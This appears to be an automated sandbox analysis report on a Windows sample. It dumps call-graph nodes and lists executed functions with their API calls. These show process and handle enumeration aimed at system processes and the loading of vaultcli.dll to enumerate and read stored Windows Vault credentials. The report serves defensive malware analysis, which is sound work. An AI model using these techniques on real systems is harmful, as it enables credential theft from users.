37496->37499 37497 4083d6 wcslen wcscat wcscpy wcscat 37497->37499 37498 410b10 wcslen wcslen 37498->37499 37499->37492 37499->37494 37499->37496 37499->37497 37499->37498 37500 408250 GetFileAttributesW 37499->37500 37501 408dc5 7 API calls 37499->37501 37500->37499 37501->37499 37502->37000 37503->37002 37505 414558 10 API calls 37504->37505 37506 410cd2 37505->37506 37518 407dd1 wcslen 37506->37518 37509 414558 10 API calls 37510 410cfb 37509->37510 37511 407dd1 2 API calls 37510->37511 37512 410d02 wcscat 37511->37512 37522 410b8f 37512->37522 37515 410b8f 22 API calls 37516 410d2f 37515->37516 37516->37499 37517->37495 37519 407df1 wcscat 37518->37519 37520 407ddc 37518->37520 37519->37509 37520->37519 37521 407de4 wcscat 37520->37521 37521->37519 37523 410b9c 37522->37523 37524 409332 9 API calls 37523->37524 37532 410bd1 37524->37532 37525 410c75 37526 409428 FindClose 37525->37526 37527 410c80 37526->37527 37527->37515 37528 409332 9 API calls 37528->37532 37529 40938f 9 API calls 37529->37532 37530 4092ee wcscmp wcscmp 37530->37532 37531 409428 FindClose 37531->37532 37532->37525 37532->37528 37532->37529 37532->37530 37532->37531 37533 408dc5 7 API calls 37532->37533 37533->37532 37535 4111a4 37534->37535 37536 4111b7 37534->37536 37559 4083d6 wcslen wcscat wcscpy wcscat 37535->37559 37555 408250 GetFileAttributesW 37536->37555 37539 4111ce 37540 4113c1 37539->37540 37541 4111d7 6 API calls 37539->37541 37540->37032 37543 41127f 37541->37543 37543->37540 37544 41128e memset 37543->37544 37556 41416c 37543->37556 37545 4112f5 wcscpy 37544->37545 37546 4112ab wcslen wcslen 37544->37546 37548 4112cb 37545->37548 37546->37548 37549 408e6f 9 API calls 37548->37549 37560 4083d6 wcslen wcscat wcscpy wcscat 37548->37560 37550 41131b memset memset _snwprintf wcscpy 37549->37550 37550->37543 37551->37011 37552->37015 37553->37020 37554->37030 37555->37539 37561 413cfb 37556->37561 37558 414190 37558->37543 37559->37536 37560->37548 37562 413d08 37561->37562 37563 413d60 GetPrivateProfileStringW 37562->37563 37564 413d0e 37562->37564 37563->37558 37565 413d12 wcschr 37564->37565 37566 413d4e 37564->37566 37565->37566 37567 413d20 _snwprintf 37565->37567 37568 413d52 WritePrivateProfileStringW 37566->37568 37567->37568 37568->37558 37596 413627 37569->37596 37572 413622 37572->37046 37573 41360f K32GetModuleFileNameExW 37573->37572 37575 413044 wcschr 37574->37575 37577 413041 wcscpy 37574->37577 37575->37577 37578 413066 37575->37578 37579 413112 37577->37579 37599 407eaf wcslen wcslen _memicmp 37578->37599 37579->37046 37581 413072 37582 41307c memset 37581->37582 37583 4130be 37581->37583 37600 408463 GetWindowsDirectoryW wcscpy 37582->37600 37585 4130c4 memset 37583->37585 37586 413109 wcscpy 37583->37586 37601 408463 GetWindowsDirectoryW wcscpy 37585->37601 37586->37579 37587 4130a1 wcscpy wcscat 37587->37579 37589 4130e9 memcpy wcscat 37589->37579 37591 4133b2 37590->37591 37592 413388 GetModuleHandleW 37590->37592 37594 4133bb GetProcessTimes 37591->37594 37595 4133ce 37591->37595 37592->37591 37593 413397 GetProcAddress 37592->37593 37593->37591 37594->37052 37595->37052 37597 413607 37596->37597 37598 41362c 6 API calls 37596->37598 37597->37572 37597->37573 37598->37597 37599->37581 37600->37587 37601->37589 37602->37077 37603->37058 37604->37062 37605->37068 37606->37083 37607->37086 37608->37090 37609->37093 37610->37097 37612 4083b0 GetVersionExW 37611->37612 37613 4083c1 37611->37613 37612->37613 37613->37101 37613->37106 37614->37107 37615->37111 37616->37113 37617->37126 37618->37130 37619->37163 37730 442bff 37620->37730 37622 443789 37623 402a48 37622->37623 37744 4153b2 37622->37744 37623->37166 37666 437bc4 37623->37666 37625 443623 11 API calls 37626 4439dd 37625->37626 37626->37623 37629 4430da 112 API calls 37626->37629 37627 4437c3 37628 4437f6 memcpy 37627->37628 37654 4437e1 37627->37654 37748 414b81 37628->37748 37629->37623 37631 443862 37632 443880 37631->37632 37633 443869 37631->37633 37753 443653 37632->37753 37635 416250 16 API calls 37633->37635 37635->37654 37637 443653 18 API calls 37638 4438a2 37637->37638 37639 443653 18 API calls 37638->37639 37640 4438ae 37639->37640 37641 443653 18 API calls 37640->37641 37642 4438be 37641->37642 37642->37654 37767 43257c 37642->37767 37645 443653 18 API calls 37646 4438ef 37645->37646 37771 41e7ee 37646->37771 37648 44390e 37649 443915 37648->37649 37650 44392d 37648->37650 37652 416250 16 API calls 37649->37652 37787 43285a 37650->37787 37652->37654 37654->37625 37655 43285a memset 37656 443948 37655->37656 37656->37654 37793 416250 37656->37793 37658 443985 37801 4344f2 37658->37801 37660 44398c 37809 436dbe 37660->37809 37664 44399c 37664->37654 37665 416250 16 API calls 37664->37665 37665->37654 37883 41695a 37666->37883 37668 437bd3 37669 437bd7 37668->37669 37671 437be3 37668->37671 37920 443a29 11 API calls 37669->37920 37890 4379cc 37671->37890 37674 437be1 37674->37170 37676 437c12 37677 4379cc 135 API calls 37676->37677 37677->37674 37679 4430ed 37678->37679 37681 443100 37678->37681 37990 416995 11 API calls 37679->37990 37681->37166 37682 4430f2 37683 443106 37682->37683 37684 4430f6 37682->37684 37992 42f943 memset memset memcpy 37683->37992 37991 443a29 11 API calls 37684->37991 37687 416250 16 API calls 37687->37681 37688 443118 37689 44312a 37688->37689 37692 44316c 37688->37692 37689->37687 37690 4431a4 37994 42f943 memset memset memcpy 37690->37994 37692->37690 37993 41e9c8 104 API calls 37692->37993 37694 4431ad 37695 416250 16 API calls 37694->37695 37696 443285 37695->37696 37696->37681 37995 422b2b memset memcpy 37696->37995 37699 40812c GetTempFileNameW 37698->37699 37700 40811e GetWindowsDirectoryW 37698->37700 37699->37162 37700->37699 37996 42481e 37701->37996 37703 424afb 37704 424b0e 37703->37704 37705 424aff 37703->37705 38004 424a0f 37704->38004 38003 443a29 11 API calls 37705->38003 37708 424b9d 37709 4155a3 16 API calls 37708->37709 37710 424b09 37709->37710 37710->37174 37712 424b5f 37712->37708 38014 424907 13 API calls 37712->38014 37715 424b20 37715->37708 37715->37712 37716 424a0f 128 API calls 37715->37716 38012 437c3b 136 API calls 37715->38012 38013 42488b 125 API calls 37715->38013 37716->37715 37717 424b7c 37717->37708 38015 41550f memcpy 37717->38015 37719->37184 37720->37184 37721->37184 37722->37184 37723->37186 37724->37196 37725->37196 37726->37196 37727->37196 37728->37196 37729->37171 37731 442c1a 37730->37731 37741 442c13 37730->37741 37820 414cce memcpy memcpy 37731->37820 37733 442c1f 37734 414e36 10 API calls 37733->37734 37735 442c50 37733->37735 37733->37741 37734->37735 37736 442cba memset 37735->37736 37735->37741 37738 442cd5 37736->37738 37737 442cea 37739 415054 10 API calls 37737->37739 37737->37741 37738->37737 37740 419077 10 API calls 37738->37740 37742 442d0a 37739->37742 37740->37737 37741->37622 37742->37741 37743 41829c 10 API calls 37742->37743 37743->37741 37745 4153bc 37744->37745 37746 4153c3 memset 37745->37746 37747 4153d2 37745->37747 37746->37747 37747->37627 37749 442bff 11 API calls 37748->37749 37750 414b8e 37749->37750 37751 414b92 37750->37751 37752 414bb8 strcmp 37750->37752 37751->37631 37752->37750 37752->37751 37754 443665 37753->37754 37755 443760 37754->37755 37756 44368b 37754->37756 37821 443a29 11 API calls 37755->37821 37758 43257c 3 API calls 37756->37758 37759 443697 37758->37759 37761 4436b2 37759->37761 37766 4436c8 37759->37766 37760 43257c 3 API calls 37762 443729 37760->37762 37763 416250 16 API calls 37761->37763 37764 416250 16 API calls 37762->37764 37765 4436be 37762->37765 37763->37765 37764->37765 37765->37637 37766->37760 37768 432586 37767->37768 37770 432593 37767->37770 37822 4324f2 memset memset memcpy 37768->37822 37770->37645 37772 41e7fe 37771->37772 37773 4153b2 memset 37772->37773 37774 41e83f 37773->37774 37775 41e849 37774->37775 37776 4153b2 memset 37774->37776 37775->37648 37777 41e85e 37776->37777 37781 41e865 37777->37781 37823 41b0f4 37777->37823 37779 41e882 37780 41e890 memset 37779->37780 37779->37781 37782 41e8ad 37780->37782 37785 41e8ba 37780->37785 37781->37775 37838 41ac3c 102 API calls 37781->37838 37784 414ac6 6 API calls 37782->37784 37784->37785 37785->37781 37837 41aae5 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37785->37837 37788 432861 37787->37788 37789 432870 37787->37789 37844 42183c memset 37788->37844 37845 4153d6 37789->37845 37792 43286d 37792->37655 37794 416259 37793->37794 37800 4162a9 37793->37800 37797 416267 37794->37797 37849 4228ed memset 37794->37849 37797->37800 37850 415eba 37797->37850 37800->37658 37802 434503 37801->37802 37870 432688 37802->37870 37804 43451d 37807 434534 37804->37807 37880 4433a8 17 API calls 37804->37880 37876 4155a3 37807->37876 37808 43453e 37808->37660 37810 436e46 37809->37810 37811 436dd3 37809->37811 37813 443623 37810->37813 37811->37810 37812 416250 16 API calls 37811->37812 37812->37811 37814 443628 37813->37814 37816 443640 37813->37816 37881 416995 11 API calls 37814->37881 37816->37664 37817 44362f 37817->37816 37882 443a29 11 API calls 37817->37882 37819 44363d 37819->37664 37821->37765 37822->37770 37826 41b12d 37823->37826 37824 4153b2 memset 37825 41b1dd 37824->37825 37827 41b21d memcpy memcpy memcpy memcpy memcpy 37825->37827 37828 41b29b 37825->37828 37831 41b164 37825->37831 37826->37831 37834 41b19f 37826->37834 37839 443a45 11 API calls 37826->37839 37827->37828 37835 41b2c8 37828->37835 37840 414b0c 37828->37840 37831->37779 37832 41b32d 37832->37831 37833 41b34d memset 37832->37833 37833->37831 37834->37824 37834->37831 37835->37831 37843 41aae5 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37835->37843 37837->37781 37838->37775 37839->37834 37842 417c9a 56 API calls 37840->37842 37841 414b22 37841->37835 37842->37841 37843->37832 37844->37792 37846 4153e2 37845->37846 37847 4153e9 memset 37846->37847 37848 4153f8 37846->37848 37847->37848 37848->37792 37849->37797 37856 415624 37850->37856 37855 4224a0 15 API calls 37855->37800 37859 415649 __aullrem __aulldvrm 37856->37859 37863 415bb4 37856->37863 37857 415cf0 37858 415d48 10 API calls 37857->37858 37858->37863 37859->37857 37860 415a98 memset 37859->37860 37861 415d48 10 API calls 37859->37861 37862 4155df 10 API calls 37859->37862 37859->37863 37860->37859 37861->37859 37862->37859 37864 415e3a 37863->37864 37865 415e41 37864->37865 37869 415e8e 37864->37869 37866 415054 10 API calls 37865->37866 37867 415e5e 37865->37867 37865->37869 37866->37867 37868 415e7b memcpy 37867->37868 37867->37869 37868->37869 37869->37800 37869->37855 37871 4326c6 37870->37871 37872 4153d6 memset 37871->37872 37875 4326fe 37871->37875 37873 432762 37872->37873 37874 432769 memcpy 37873->37874 37873->37875 37874->37875 37875->37804 37877 4155a7 37876->37877 37879 4155c2 37876->37879 37878 416250 16 API calls 37877->37878 37877->37879 37878->37879 37879->37808 37880->37807 37881->37817 37882->37819 37884 416977 37883->37884 37889 41695f 37883->37889 37885 416990 37884->37885 37923 416995 11 API calls 37884->37923 37885->37668 37888 416970 37888->37668 37889->37888 37922 41607a 11 API calls 37889->37922 37891 4153d6 memset 37890->37891 37892 4379ea 37891->37892 37893 437aa4 37892->37893 37895 437a33 37892->37895 37919 4379f4 37892->37919 37924 4428fe 37893->37924 37894 4155a3 16 API calls 37897 437bbc 37894->37897 37898 437a5a 37895->37898 37899 437a38 37895->37899 37897->37674 37921 42483d 124 API calls 37897->37921 37955 415549 memcpy 37898->37955 37900 416250 16 API calls 37899->37900 37902 437a46 37900->37902 37904 4155a3 16 API calls 37902->37904 37903 437a67 37906 4428fe 19 API calls 37903->37906 37908 437a79 37903->37908 37904->37919 37905 437ad6 37911 437ae6 37905->37911 37956 42f943 memset memset memcpy 37905->37956 37906->37908 37908->37905 37950 4378e9 37908->37950 37910 437b2f 37912 437b57 37910->37912 37958 423e57 124 API calls 37910->37958 37911->37910 37957 415549 memcpy 37911->37957 37914 437b66 37912->37914 37915 437b7e 37912->37915 37917 416250 16 API calls 37914->37917 37918 416250 16 API calls 37915->37918 37917->37919 37918->37919 37919->37894 37920->37674 37921->37676 37922->37888 37923->37889 37928 442926 37924->37928 37925 442971 37925->37908 37926 442aad 37940 442ac7 37926->37940 37971 440778 memset 37926->37971 37927 4429d5 37927->37926 37930 442a8d 37927->37930 37933 442367 19 API calls 37927->37933 37928->37925 37928->37927 37932 442a29 37928->37932 37935 4429cb 37928->37935 37959 442367 37928->37959 37931 442367 19 API calls 37930->37931 37931->37926 37968 415f19 37932->37968 37933->37930 37967 4162c2 11 API calls 37935->37967 37936 442b0e 37941 442b2d 37936->37941 37973 41607a 11 API calls 37936->37973 37940->37936 37972 41557c 11 API calls 37940->37972 37943 442b4f 37941->37943 37974 423f54 memset memcpy 37941->37974 37942 442b74 37976 43b26b memset 37942->37976 37943->37942 37975 42faa8 memset 37943->37975 37948 442b84 37948->37925 37977 42faa8 memset 37948->37977 37951 4379a0 37950->37951 37952 437909 37950->37952 37951->37905 37952->37951 37978 41ed4e 37952->37978 37989 41ef54 105 API calls 37952->37989 37955->37903 37956->37911 37957->37910 37958->37912 37960 442371 37959->37960 37961 442403 37960->37961 37963 4162c2 11 API calls 37960->37963 37964 442401 37960->37964 37965 44086e 19 API calls 37960->37965 37966 440694 memset 37960->37966 37962 440818 12 API calls 37961->37962 37962->37964 37963->37960 37964->37928 37965->37960 37966->37960 37967->37927 37969 415eba 11 API calls 37968->37969 37970 415f27 37969->37970 37970->37927 37971->37926 37972->37936 37973->37941 37974->37943 37975->37942 37976->37948 37977->37948 37979 41ee69 37978->37979 37984 41ed6b 37978->37984 37980 41ed82 37979->37980 37981 41bf50 memset memset 37979->37981 37980->37952 37981->37980 37982 41eac1 105 API calls 37982->37984 37983 41ecb4 87 API calls 37983->37984 37984->37980 37984->37982 37984->37983 37985 41b98a memcmp 37984->37985 37986 41eccd 91 API calls 37984->37986 37987 41ee27 37984->37987 37985->37984 37986->37984 37987->37979 37987->37980 37988 41bbb0 87 API calls 37987->37988 37988->37979 37989->37952 37990->37682 37991->37681 37992->37688 37993->37692 37994->37694 37995->37681 37997 424823 37996->37997 37998 424836 37996->37998 38016 41607a 11 API calls 37997->38016 38017 424801 11 API calls 37998->38017 38001 42482f 38001->37703 38002 42483b 38002->37703 38003->37710 38005 424a1f 38004->38005 38010 424a24 38004->38010 38050 42488b 125 API calls 38005->38050 38008 424a85 38011 4155a3 16 API calls 38008->38011 38009 424a2c 38009->37715 38010->38009 38018 424f4b 38010->38018 38011->38009 38012->37715 38013->37715 38014->37717 38015->37708 38016->38001 38017->38002 38019 424fa1 38018->38019 38046 425272 38018->38046 38024 42528a 38019->38024 38027 4292fd 38019->38027 38031 422407 memset memcpy memcpy 38019->38031 38033 425951 38019->38033 38045 429371 38019->38045 38019->38046 38049 4252e8 38019->38049 38051 42210c memset memcpy 38019->38051 38052 4224a0 15 API calls 38019->38052 38053 422479 memset memcpy memcpy 38019->38053 38054 421f5c 13 API calls 38019->38054 38056 423b15 11 API calls 38019->38056 38057 423a53 91 API calls 38019->38057 38061 41607a 11 API calls 38024->38061 38025 42598d 38062 423b6a 121 API calls 38025->38062 38030 429316 38027->38030 38035 42934b 38027->38035 38063 41557c 11 API calls 38030->38063 38031->38019 38060 41557c 11 API calls 38033->38060 38036 429346 38035->38036 38065 41607a 11 API calls 38035->38065 38066 423b6a 121 API calls 38036->38066 38037 425386 38037->38008 38038 42932a 38064 41607a 11 API calls 38038->38064 38045->38037 38067 41557c 11 API calls 38045->38067 38046->38037 38055 41557c 11 API calls 38046->38055 38049->38046 38058 421f5c 13 API calls 38049->38058 38059 421ffc 12 API calls 38049->38059 38050->38010 38051->38019 38052->38019 38053->38019 38054->38019 38055->38024 38056->38019 38057->38019 38058->38049 38059->38049 38060->38024 38061->38025 38062->38037 38063->38038 38064->38036 38065->38036 38066->38045 38067->38024 38068->37207 38069->37214 38070->37204 38071->37211 38072->37234 38073->37250 38208 424fc1 126 API calls 38210 40f533 170 API calls 38212 42f136 112 API calls 38214 418137 8 API calls 38215 440c04 17 API calls 38217 44093d 18 API calls 38407 44128d 14 API calls 38409 42cb3c 165 API calls 38411 4267ca 87 API calls 38412 42cbca 165 API calls 38413 4113c8 72 API calls 38414 4033ca 55 API calls 38415 424bcf 15 API calls 38416 433fcd 18 API calls 38225 4055d0 12 API calls 38418 42d7d1 14 API calls 38230 412ddd 8 API calls 38231 414ddc InitializeCriticalSection memset 38420 4343de 17 API calls 38232 40e9de 12 API calls 38422 441bda 23 API calls 36197 4141e0 FindResourceW 36198 4141f9 SizeofResource 36197->36198 36199 414223 36197->36199 36198->36199 36200 41420a LoadResource 36198->36200 36200->36199 36201 414218 LockResource 36200->36201 36201->36199 38233 424fc1 128 API calls 38234 4181e3 Sleep 38235 433de9 20 API calls 38236 428de9 139 API calls 38237 4031ec CompareFileTime 38238 440c04 174 API calls 38239 425272 121 API calls 38240 441df4 140 API calls 38240->38240 38243 444df1 _onexit __dllonexit 38429 4173f4 SetFilePointer GetLastError GetLastError SetEndOfFile GetLastError 38430 442ff8 memcmp 38431 4053fe EndDialog GetTickCount GetTickCount 38249 439d80 17 API calls 36363 440b83 36366 42ff8c 36363->36366 36365 440b8f 36365->36365 36367 42ffaa 36366->36367 36379 42ffc1 36366->36379 36368 42ffb3 36367->36368 36369 42ffc8 36367->36369 36380 4162c2 11 API calls 36368->36380 36381 42fba5 memcpy 36369->36381 36372 430023 36373 43006b memset 36372->36373 36382 415471 11 API calls 36372->36382 36373->36379 36374 42ffd3 36374->36372 36377 43004c 36374->36377 36374->36379 36376 43003d 36376->36373 36376->36379 36383 4162c2 11 API calls 36377->36383 36379->36365 36380->36379 36381->36374 36382->36376 36383->36379 38252 44098c 22 API calls 38253 424fc1 130 API calls 38433 40338e strlen WriteFile 38435 40d793 10 API calls 38437 41e796 11 API calls 38256 414d99 InterlockedCompareExchange DeleteCriticalSection 38439 440b9e 13 API calls 38258 41419a memset _itow WritePrivateProfileStringW GetPrivateProfileIntW 38259 40f99d 79 API calls 38440 441b9b 149 API calls 38441 4297a2 12 API calls __allrem 38263 4171a2 27 API calls 38442 42dba7 17 API calls 38266 4341ab 15 API calls 38445 440fac 15 API calls 38447 4177af memset UnlockFileEx LockFileEx GetLastError 38267 4291bd memcpy

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 0040978A Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 296 40978a-4097f0 memset call 408282 CreateFileW 299 4097f6-40980e call 409539 call 4118ea 296->299 304 409810-40981f NtQuerySystemInformation 299->304 305 409821 299->305 306 409825-40982c 304->306 305->306 307 409840-409857 FindCloseChangeNotification GetCurrentProcessId 306->307 308 40982e-40983e 306->308 309 409859-40985d 307->309 310 40987f-409893 call 4133d2 call 413424 307->310 308->299 308->307 309->310 311 40985f 309->311 320 409a11-409a20 call 413401 310->320 321 409899-4098c0 call 40a109 call 40830a _wcsicmp 310->321 313 409862-409868 311->313 315 409879-40987d 313->315 316 40986a-409871 313->316 315->310 315->313 316->315 318 409873-409876 316->318 318->315 328 4098c2-4098d3 _wcsicmp 321->328 329 4098ec-4098fc OpenProcess 321->329 328->329 330 4098d5-4098e6 _wcsicmp 328->330 331 409902-409907 329->331 332 4099fd-409a00 329->332 330->329 333 409a02-409a0b 330->333 334 4099f4-4099f7 CloseHandle 331->334 335 40990d 331->335 332->320 332->333 333->320 333->321 334->332 336 409910-409915 335->336 337 4099c2-4099d0 336->337 338 40991b-409922 336->338 337->336 339 4099d6-4099d8 337->339 338->337 340 409928-40994f GetCurrentProcess DuplicateHandle 338->340 339->334 340->337 341 409951-40997b memset call 4118ea 340->341 344 409994-4099c0 CloseHandle call 40830a * 2 _wcsicmp 341->344 345 40997d-40998f 341->345 344->337 350 4099da-4099f2 344->350 345->344 350->334
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004097B2
                                                                                                                                                                          • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                          • Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
                                                                                                                                                                          • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
                                                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004098B7
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004098CA
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004098DD
                                                                                                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
                                                                                                                                                                        • memset.MSVCRT ref: 00409964
                                                                                                                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004099B7
                                                                                                                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                        • API String ID: 594330280-3398334509
                                                                                                                                                                        • Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
                                                                                                                                                                        • Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004443B0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 409 4443b0-4443b4 410 444424 409->410 411 4443b6-444423 LoadLibraryW GetProcAddress * 7 409->411 411->410
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                                        • API String ID: 2238633743-2107673790
                                                                                                                                                                        • Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
                                                                                                                                                                        • Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
                                                                                                                                                                        • Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
                                                                                                                                                                        • Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00413424 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 489 413424-413478 call 40b1bf CreateToolhelp32Snapshot memset Process32FirstW 492 4135d8-4135e9 Process32NextW 489->492 493 41347d-4134c5 OpenProcess 492->493 494 4135ef-4135fc CloseHandle 492->494 495 413588-41358d 493->495 496 4134cb-4134fe memset call 4135ff 493->496 495->492 497 41358f-413595 495->497 504 413551-413575 call 413031 call 41337c 496->504 505 413500-41350d 496->505 499 4135a0-4135b2 call 4080ac 497->499 500 413597-41359e free 497->500 502 4135b3-4135ba 499->502 500->502 507 4135bc 502->507 508 4135bf-4135d6 502->508 516 41357a-413586 CloseHandle 504->516 509 413539-413540 505->509 510 41350f-41351c GetModuleHandleW 505->510 507->508 508->492 509->504 513 413542-41354f QueryFullProcessImageNameW 509->513 510->509 512 41351e-413534 GetProcAddress 510->512 512->509 513->504 516->495
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00413442
                                                                                                                                                                        • memset.MSVCRT ref: 00413457
                                                                                                                                                                        • Process32FirstW.KERNEL32(?,?), ref: 00413473
                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
                                                                                                                                                                        • memset.MSVCRT ref: 004134DF
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
                                                                                                                                                                        • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 0041354F
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
                                                                                                                                                                        • free.MSVCRT(-00000028), ref: 00413599
                                                                                                                                                                        • Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
